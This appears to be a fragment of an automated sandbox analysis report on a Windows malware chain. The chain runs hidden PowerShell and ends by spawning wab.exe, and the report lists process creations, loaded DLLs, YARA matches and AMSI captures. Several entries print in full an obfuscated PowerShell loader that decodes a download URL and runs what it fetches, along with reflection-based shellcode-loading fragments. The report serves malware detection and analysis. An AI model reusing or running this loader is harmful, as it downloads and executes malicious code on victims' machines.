ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ 
gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= 
Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptnet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: devenum.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntmarta.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: devobj.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msdmo.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: avicap32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msvfw32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.2443760561.00000000074E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000006.00000002.2447876168.000000000923E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2447508436.00000000086D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2441971801.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Acrux)$global:Quarentene = [System.Text.Encoding]::ASCII.GetString($Antisemits)$global:Varmtvandsbadeanstalten=$Quarentene.substring($Samojedens,$Stabelstolen)<#monocentric Efterflge
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Strygebrttet $sammenlimningens $Bravurs), (Offishness @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Radiotelephoning = [AppDomain]::CurrentDomain.GetAsse
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Elachistaceae)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Entourages, $false).DefineType($Lockups, $P
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Acrux)$global:Quarentene = [System.Text.Encoding]::ASCII.GetString($Antisemits)$global:Varmtvandsbadeanstalten=$Quarentene.substring($Samojedens,$Stabelstolen)<#monocentric Efterflge
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE 